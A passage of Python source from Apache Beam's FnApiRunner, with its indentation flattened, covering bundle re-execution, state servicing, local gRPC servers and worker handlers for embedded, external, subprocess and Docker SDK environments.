# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
# type: (bytes) -> PartitionableBuffer
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components.pcollections[output_pcoll].
windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[
safe_coders[beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload).
coder_id]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list,
process_bundle_descriptor,
data_input,
data_output,
get_input_coder_impl,
cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list,
get_buffer,
get_input_coder_impl,
process_bundle_descriptor,
self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
# type: (str, str) -> str
input_pcoll = process_bundle_descriptor.transforms[transform_id].inputs[
input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN and
input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError('No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
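# Repeatedly re-run the stage on any deferred inputs (written timers, SDK
# residual roots and runner-initiated splits) until a bundle finishes with
# nothing left to replay.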
while True:
deferred_inputs = collections.defaultdict(
_ListBuffer) # type: DefaultDict[str, PartitionableBuffer]
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)].append(
delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
# TODO(BEAM-8486): this should be changed to _registered
bundle_manager._skip_registration = True # type: ignore[attr-defined]
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage, # type: fn_api_runner_transforms.Stage
pipeline_components, # type: beam_runner_api_pb2.Components
data_api_service_descriptor, # type: Optional[endpoints_pb2.ApiServiceDescriptor]
pcoll_buffers # type: DefaultDict[bytes, PartitionableBuffer]
):
# type: (...) -> Tuple[Dict[str, PartitionableBuffer], DataSideInput, DataOutput]
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {} # type: Dict[str, PartitionableBuffer]
data_side_input = {} # type: DataSideInput
data_output = {} # type: DataOutput
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[only_element(
transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[only_element(
transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(
list) # type: FnApiRunner.StateServicer.StateType
self._checkpoint = None # type: Optional[FnApiRunner.StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
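# While a checkpoint is active, writes go to a copy-on-write overlay;
# restore() discards the overlay and commit() folds it back into the
# underlying state.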
def commit(self):
# type: () -> None
assert isinstance(self._state,
FnApiRunner.StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
FnApiRunner.StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (FnApiRunner.StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
:arg static: If True, the generator always returns the same cache token.
  If False, the generator returns a new cache token each time.
:return: A generator which yields a cache token on next(generator).
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2.ProcessBundleRequest.CacheToken.UserState(
),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
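# Illustrative usage (a sketch; the dynamic generator's counter starts at 0,
# so the first token produced is b'cache_token_1'):
#   tokens = FnApiRunner.get_cache_token_generator(static=False)
#   next(tokens).token  # b'cache_token_1'
#   next(tokens).token  # b'cache_token_2'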
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler,
data_plane_handler,
state, # type: FnApiRunner.StateServicer
provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]]
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
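# The handler subclasses below use this as a decorator, e.g.
#   @WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
# and WorkerHandler.create() then dispatches on environment.urn.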
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: Optional[ExtendedProvisionInfo]
unused_grpc_server=None
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()), {})
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> None
return None
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, info):
# type: (Optional[beam_provision_api_pb2.ProvisionInfo]) -> None
self._info = info
def GetProvisionInfo(self, request, context=None):
# type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse
return beam_provision_api_pb2.GetProvisionInfoResponse(info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir
) # type: beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# TODO(BEAM-8646): Reconcile the behavior on Windows platform.
if sys.platform == 'win32':
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocess module is not thread-safe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s', self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
_LOGGER.info(
    'Waiting for docker to start up. Current status is %s', status)
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
# type: () -> None
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None # type: Optional[GrpcServer]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self._state,
self._job_provision_info,
self._grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s",
worker_handler,
environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
    "Error closing worker_handler %s", worker_handler, exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self,
provision_info=None, # type: Optional[beam_provision_api_pb2.ProvisionInfo]
artifact_staging_dir=None,
job_name=None, # type: Optional[str]
):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
self.job_name = job_name
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
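# A minimal sketch of a split manager as used in tests (the stage name and
# helper below are hypothetical):
#
#   def halve_once(num_elements):
#     split_result = yield 0.5  # request a split at half of the remainder
#     # inspect split_result; further fractions may be yielded here
#
#   with split_manager('MyStage', halve_once):
#     run_pipeline_under_test()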
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(self,
